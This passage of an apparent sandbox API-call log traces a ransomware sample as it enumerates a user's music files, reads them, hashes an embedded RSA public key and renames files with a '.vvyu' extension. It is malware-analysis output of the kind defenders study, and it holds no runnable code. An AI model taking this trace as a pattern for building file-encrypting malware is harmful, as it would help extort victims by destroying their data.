hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.207] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.207] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0198.207] CloseHandle (hObject=0x52c) returned 1 [0198.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe0) returned 0x6dc668 [0198.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8f0) returned 0x2d3a670 [0198.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc668 | out: hHeap=0x6a0000) returned 1 [0198.210] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\rQWnqazpz-naoLL5P.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\rqwnqazpz-naoll5p.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\rQWnqazpz-naoLL5P.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\rqwnqazpz-naoll5p.wav.vvyu")) returned 1 [0198.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0198.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.212] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0198.216] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cc54d0, ftCreationTime.dwHighDateTime=0x1d89cc6, ftLastAccessTime.dwLowDateTime=0x97e38980, ftLastAccessTime.dwHighDateTime=0x1d8a3b1, ftLastWriteTime.dwLowDateTime=0x97e38980, ftLastWriteTime.dwHighDateTime=0x1d8a3b1, nFileSizeHigh=0x0, nFileSizeLow=0x12b88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZcUZ5M4Jt.wav", cAlternateFileName="ZCUZ5M~1.WAV")) returned 1 [0198.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0198.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11e) returned 0x2d31688 [0198.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0198.217] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\ZcUZ5M4Jt.wav") returned=".wav" [0198.217] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\ZcUZ5M4Jt.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\zcuz5m4jt.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0198.218] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=76680) returned 1 [0198.218] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0198.222] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x12b62, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.222] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0198.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.224] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.225] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x12b88, lpOverlapped=0x0) returned 1 [0198.226] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0198.226] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.226] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.226] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0198.227] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0198.227] CryptHashData (hHash=0x2cbfad0, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.227] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0198.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0198.227] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0198.227] GetLastError () returned 0x0 [0198.227] CryptDestroyHash (hHash=0x2cbfad0) returned 1 [0198.227] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0198.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0198.227] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0198.227] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0198.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.228] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0198.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x12b90) returned 0x2d51778 [0198.229] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0198.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0198.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0198.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d628 [0198.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4e0 [0198.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d670 [0198.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4f8 [0198.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a528 [0198.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a588 [0198.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a540 [0198.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0198.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0198.230] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0198.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0198.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0198.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a588 [0198.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0198.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a540 [0198.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0198.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a528 [0198.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0198.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0198.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0198.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0198.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0198.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0198.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0198.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0198.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0198.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0198.235] GetCurrentThreadId () returned 0x264 [0198.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0198.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4c360 [0198.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0198.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0198.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0198.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0198.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0198.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.236] GetCurrentThreadId () returned 0x264 [0198.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0198.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0198.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a588 [0198.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a528 [0198.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0198.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0198.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0198.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0198.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a540 [0198.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0198.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0198.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0198.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a510 [0198.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0198.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5a0 [0198.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0198.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a570 [0198.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a558 [0198.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5b8 [0198.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a558 [0198.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0198.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0198.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0198.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a528 [0198.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0198.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0198.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5b8 | out: hHeap=0x6a0000) returned 1 [0198.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0198.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0198.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0198.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0198.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0198.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0198.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0198.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0198.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0198.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0198.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0198.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0198.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0198.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0198.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0198.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0198.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0198.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d670 | out: hHeap=0x6a0000) returned 1 [0198.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0198.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0198.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0198.247] HeapFree (in: 